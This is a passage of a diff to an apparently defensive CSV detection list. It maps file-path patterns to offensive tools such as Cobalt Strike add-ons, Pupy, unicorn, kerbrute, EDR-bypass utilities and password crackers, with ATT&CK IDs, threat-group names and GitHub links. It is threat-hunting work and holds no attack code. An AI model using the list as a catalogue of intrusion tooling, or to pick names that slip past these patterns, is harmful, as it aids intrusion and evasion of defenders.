abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*/UAC-SilentClean/*","offensive_tool_keyword","cobaltstrike","New UAC bypass for Silent Cleanup for CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EncodeGroup/UAC-SilentClean","1","1","N/A","10","10","174","32","2021-07-14T13:51:02Z","2020-10-07T13:25:21Z" "*/uberfile.py*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*/ubiquiti-discovery.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/udmp-parser.git*","offensive_tool_keyword","udmp-parser","A Cross-Platform C++ parser library for Windows user minidumps.","T1005 - T1059.003 - T1027.002","TA0009 - TA0005 - TA0040","N/A","N/A","Credential Access","https://github.com/0vercl0k/udmp-parser","1","1","N/A","6","2","160","22","2023-08-27T18:30:24Z","2022-01-30T18:56:21Z" @@ -5671,24 +5733,24 @@ "*/unhook-bof*","offensive_tool_keyword","C2 related tools","Thread Stack Spoofing - PoC for an advanced In-Memory evasion technique allowing to better hide injected shellcode's memory allocation from scanners and analysts.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/mgeeky/ThreadStackSpoofer","1","1","N/A","10","10","875","158","2022-06-17T18:06:35Z","2021-09-26T22:48:17Z" "*/unhook-bof*","offensive_tool_keyword","cobaltstrike","Remove API hooks from a Beacon process.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/unhook-bof","1","1","N/A","10","10","240","61","2021-09-18T18:12:41Z","2021-01-13T02:20:44Z" "*/unhook-bof*","offensive_tool_keyword","cobaltstrike","Remove API hooks from a Beacon process.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/unhook-bof","1","1","N/A","10","10","51","14","2022-03-13T15:57:10Z","2021-07-02T14:55:38Z" -"*/UnhookingPatch.git*","offensive_tool_keyword","UnhookingPatch","Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime","T1055 - T1055.001 - T1070 - T1070.004 - T1211","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/UnhookingPatch","1","1","N/A","9","3","259","43","2023-08-02T02:25:38Z","2023-02-08T16:21:03Z" +"*/UnhookingPatch.git*","offensive_tool_keyword","UnhookingPatch","Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime","T1055 - T1055.001 - T1070 - T1070.004 - T1211","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/UnhookingPatch","1","1","N/A","9","3","260","43","2023-08-02T02:25:38Z","2023-02-08T16:21:03Z" "*/unicorn.git*","offensive_tool_keyword","unicorn","Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory","T1059.001 - T1055.012 - T1027.002 - T1547.009","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/trustedsec/unicorn","1","1","N/A","N/A","10","3503","839","2023-09-15T05:43:27Z","2013-06-19T08:38:06Z" "*/unicorn.py*","offensive_tool_keyword","unicorn","Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory","T1059.001 - T1055.012 - T1027.002 - T1547.009","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/trustedsec/unicorn","1","1","N/A","N/A","10","3503","839","2023-09-15T05:43:27Z","2013-06-19T08:38:06Z" "*/unittest.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/unshackle.git*","offensive_tool_keyword","unshackle","Unshackle is an open-source tool to bypass Windows and Linux user passwords from a bootable USB based on Linux","T1110.004 - T1059.004 - T1070.004","TA0006 - TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Fadi002/unshackle","1","1","N/A","10","10","1482","83","2023-09-23T15:54:14Z","2023-07-19T22:30:28Z" -"*/unshackle.modules*","offensive_tool_keyword","unshackle","Unshackle is an open-source tool to bypass Windows and Linux user passwords from a bootable USB based on Linux","T1110.004 - T1059.004 - T1070.004","TA0006 - TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Fadi002/unshackle","1","0","N/A","10","10","1482","83","2023-09-23T15:54:14Z","2023-07-19T22:30:28Z" -"*/unused/locktest.sh*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*/unused/Yosemite.patch*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*/unshackle.git*","offensive_tool_keyword","unshackle","Unshackle is an open-source tool to bypass Windows and Linux user passwords from a bootable USB based on Linux","T1110.004 - T1059.004 - T1070.004","TA0006 - TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Fadi002/unshackle","1","1","N/A","10","10","1485","84","2023-09-23T15:54:14Z","2023-07-19T22:30:28Z" +"*/unshackle.modules*","offensive_tool_keyword","unshackle","Unshackle is an open-source tool to bypass Windows and Linux user passwords from a bootable USB based on Linux","T1110.004 - T1059.004 - T1070.004","TA0006 - TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Fadi002/unshackle","1","0","N/A","10","10","1485","84","2023-09-23T15:54:14Z","2023-07-19T22:30:28Z" +"*/unused/locktest.sh*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*/unused/Yosemite.patch*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*/unusual-port.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/upnp-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/uptime-agent-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/url-snarf.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/user_data/*/keylog.txt*","offensive_tool_keyword","cuddlephish","Weaponized Browser-in-the-Middle (BitM) for Penetration Testers","T1185 - T1185.002 - T1071 - T1071.001 - T1556 - T1556.001","TA0009 - TA0006","N/A","N/A","Sniffing & Spoofing","https://github.com/fkasler/cuddlephish","1","1","N/A","10","2","152","10","2023-09-06T12:25:08Z","2023-08-02T14:30:41Z" -"*/userenum.go*","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","2144","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z" -"*/UserlandBypass/*.c*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","10","2","180","34","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" +"*/userenum.go*","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","2145","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z" +"*/UserlandBypass/*.c*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","10","2","183","35","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" "*/username-anarchy*","offensive_tool_keyword","username-anarchy","Tools for generating usernames when penetration testing. Usernames are half the password brute force problem.","T1110 - T1134 - T1078","TA0006","N/A","N/A","Credential Access","https://github.com/urbanadventurer/username-anarchy","1","1","N/A","N/A","6","564","113","2022-01-26T18:34:02Z","2012-11-07T05:35:10Z" "*/UserNamespaceOverlayfsSetuidWriteExec/*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" -"*/usniper.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*/usniper.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" "*/usr/bin/pkexec*","offensive_tool_keyword","POC","Exploit for the pwnkit vulnerability (https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt) from the Qualys team","T1068","TA0004","N/A","N/A","Exploitation tools","https://github.com/Ayrx/CVE-2021-4034","1","1","N/A","N/A","1","97","16","2022-01-27T11:57:05Z","2022-01-26T03:33:47Z" "*/usr/bin/polenum*","offensive_tool_keyword","polenum","Uses Impacket Library to get the password policy from a windows machine","T1012 - T1596","TA0009 - TA0007","N/A","N/A","Discovery","https://salsa.debian.org/pkg-security-team/polenum","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*/usr/local/bin/exegol*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" @@ -5696,13 +5758,14 @@ "*/usr/share/cobaltstrike/*","offensive_tool_keyword","C2concealer","C2concealer is a command line tool that generates randomized C2 malleable profiles for use in Cobalt Strike.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/RedSiege/C2concealer","1","0","N/A","10","10","850","162","2021-09-26T16:37:06Z","2020-03-23T14:13:16Z" "*/usr/share/wordlists/*.txt*","offensive_tool_keyword","fcrackzip","a Free/Fast Zip Password Cracker","T1473 - T1021.002","TA0005 - TA0008","N/A","N/A","Credential Access","https://manpages.ubuntu.com/manpages/trusty/man1/fcrackzip.1.html","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/utils/addcomputer.py*","offensive_tool_keyword","sam-the-admin","script used in the POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1208 - T1218.005 - T1055.002","TA0006 - TA0007 - TA0008","N/A","N/A","Exploitation tools","https://github.com/WazeHell/sam-the-admin/tree/main/utils","1","0","N/A","N/A","10","929","190","2022-07-10T22:23:13Z","2021-12-11T15:10:30Z" -"*/utils/obfuscate.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*/utils/obfuscate.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" "*/UTWOqVQ132/*","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","10","10","1362","429","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" "*/UUID_bypass.py*","offensive_tool_keyword","FourEye","AV Evasion Tool","T1059 - T1059.001 - T1059.005 - T1027 - T1027.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/lengjibo/FourEye","1","1","N/A","10","8","724","154","2021-12-08T11:55:15Z","2020-12-11T01:29:58Z" "*/vainject.c*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*/vajra/phishApp.py*","offensive_tool_keyword","Vajra","Vajra is a UI based tool with multiple techniques for attacking and enumerating in target's Azure environment","T1087 - T1098 - T1583 - T1078 - T1110 - T1566 - T1537 - T1020 - T1526 - T1482","TA0003 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/TROUBLE-1/Vajra","1","1","N/A","N/A","4","336","57","2023-03-16T09:45:53Z","2022-03-01T14:31:27Z" "*/var/lib/ptunnel*","offensive_tool_keyword","ptunnel-ng","Tunnel TCP connections through ICMP.","T1095.001 - T1043 - T1572.001","TA0011 - TA0040 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/utoni/ptunnel-ng","1","1","N/A","N/A","3","285","60","2023-05-17T12:47:52Z","2017-12-19T18:10:35Z" "*/var/log/exegol/*.log*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*/veeam_dump.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "*/Vegile.git*","offensive_tool_keyword","BruteSploit","Ghost In The Shell - This tool will setting up your backdoor/rootkits when backdoor already setup it will be hidden your spesisifc process.unlimited your session in metasploit and transparent. Even when it killed. it will re-run again. There always be a procces which while run another process.So we can assume that this procces is unstopable like a Ghost in The Shell","T1587 - T1588 - T1608","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/Vegile","1","1","N/A","N/A","7","686","175","2022-09-01T01:54:35Z","2018-01-02T05:29:48Z" "*/venom.git*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" "*/venom.sh *","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","0","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" @@ -5721,32 +5784,32 @@ "*/VirusTotalC2/*","offensive_tool_keyword","VirusTotalC2","Abusing VirusTotal API to host our C2 traffic. usefull for bypassing blocking firewall rules if VirusTotal is in the target white list and in case you don't have C2 infrastructure. now you have a free one","T1071.004 - T1102 - T1021.002","TA0011 - TA0008 - TA0042","N/A","N/A","C2","https://github.com/RATandC2/VirusTotalC2","1","1","N/A","10","10","5","81","2022-09-28T15:10:44Z","2022-09-28T15:12:42Z" "*/VisualBasicObfuscator*","offensive_tool_keyword","phishing-HTML-linter","Phishing and Social-Engineering related scripts","T1566.001 - T1056.001","TA0040 - TA0001","N/A","N/A","Phishing","https://github.com/mgeeky/Penetration-Testing-Tools/blob/master/phishing","1","1","N/A","10","10","2282","458","2023-06-27T19:16:49Z","2018-02-02T21:24:03Z" "*/vmauthd-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/vmware_enum_*.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*/vmware_enum_*.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*/VMware-CVE-2022-22954*","offensive_tool_keyword","POC","POC for VMWARE CVE-2022-22954","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/sherlocksecurity/VMware-CVE-2022-22954","1","1","N/A","N/A","3","285","53","2022-04-13T06:15:11Z","2022-04-11T13:59:23Z" "*/vmware-version.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - 